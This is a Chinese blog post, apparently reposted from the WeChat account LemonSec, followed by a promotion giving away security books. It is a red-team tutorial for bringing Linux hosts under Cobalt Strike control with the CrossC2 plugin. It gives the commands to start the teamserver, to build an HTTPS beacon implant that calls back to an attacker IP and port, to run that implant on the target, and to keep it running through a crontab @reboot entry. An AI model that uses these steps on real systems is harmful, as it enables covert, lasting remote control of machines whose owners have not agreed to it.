在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike原生对于上线windows比较轻松友好,但如果是Linux平台就需要用到第三方插件了。
准备工作
这里使用CrossC2的插件,类似于在linux上反弹一个cobaltstrike类的shell。
github:https://github.com/gloxec/CrossC2
下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3)
需要下载以下两个文件:
CrossC2***.cna、genCrossC2.Linux
由于我的木马是在linux平台生成的,因此使用genCrossC2.Linux,可根据自己平台的差异自行选择
服务端部署
cobaltstrike服务端部署
chmod +x teamserver./teamserver [ip]
客户端连接
建立一个监听器,需要注意的是crossc2插件只支持https的beacon
安装crossc2
生成木马
我这里是在服务端的cobaltstrike目录直接生成的,如果在非服务端生成需要将服务端根目录的隐藏文件.cobaltstrike.beacon_keys复制下来放到cs根目录
chmod +x genCrossC2.Linux./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test
上线
在目标靶机上直接运行就可以看到上线了.
chmod +x test./test
权限维持
一个简单的思想就是将其添加的系统启动项
有很多种方法,这里讲个最简单的,通过计划任务的方式实现
crontab -e@reboot /tmp/test
这样每次重启之后都能重新执行
这里需要注意的是要设置以下次登录的用户的crontab
作者:xzajyjs原文链接:https://blog.csdn.net/qq_35664104
赠书福利
一:Kerberos域网络安全从入门到精通
1.详细分析kerberos域网络安全漏洞,有针对性介绍攻防对抗方,维护kerberos域网络安全,保证企业网络安全稳定运行。Kerberos域网络作为承载企业资源和个人资源的基础网络,一旦失陷后果 严重。解决域网络安全问题是攻防从业人员必须解决的难题,本书详细介绍所有域网络相关漏洞,并给出攻防对抗方法,让安全从业人员“知己知彼,百战百胜”。2. 首本成体系的kerberos域网络安全教程,填补域网络安全书籍空白。域网络安全 重要,但是市场上关于域网络安全的图书都是国外引进,并不 适应我国企业需求,本书则从 企业的实际需求出发,介绍符合实际的攻防对抗方案, 有参考价值。3.原理介绍 + 案例分析 + 实验演示,增强了本书的可读性与实践指导性,读者能轻松、系统地掌握 Kerberos 域网络安全的相关内容,为我国 Kerberos 域网络的安全建设工作添砖加瓦。
二:人工智能技术基础
三:人工智能原理与实践
为了感谢大家一直以来的关注与支持,会有三本书籍免费赠送
。
规则如下:
1. 本文末点‘在看’,不需要转发朋友圈,点个‘在看’就可以。
2. 私聊文末公众号发送“0805”即可扫描参与抽奖,注意看是发送暗号“0805”。
3. 中奖者不满足条件1,视为放弃中奖资格。
4. 活动截止时间08月05日 17:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!
先点“再看”,然后点击下方公众号私聊发送“0805” 即可马上扫描参与抽奖
原文始发于微信公众号(LemonSec):CobaltStrike上线Linux【文末赠书】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论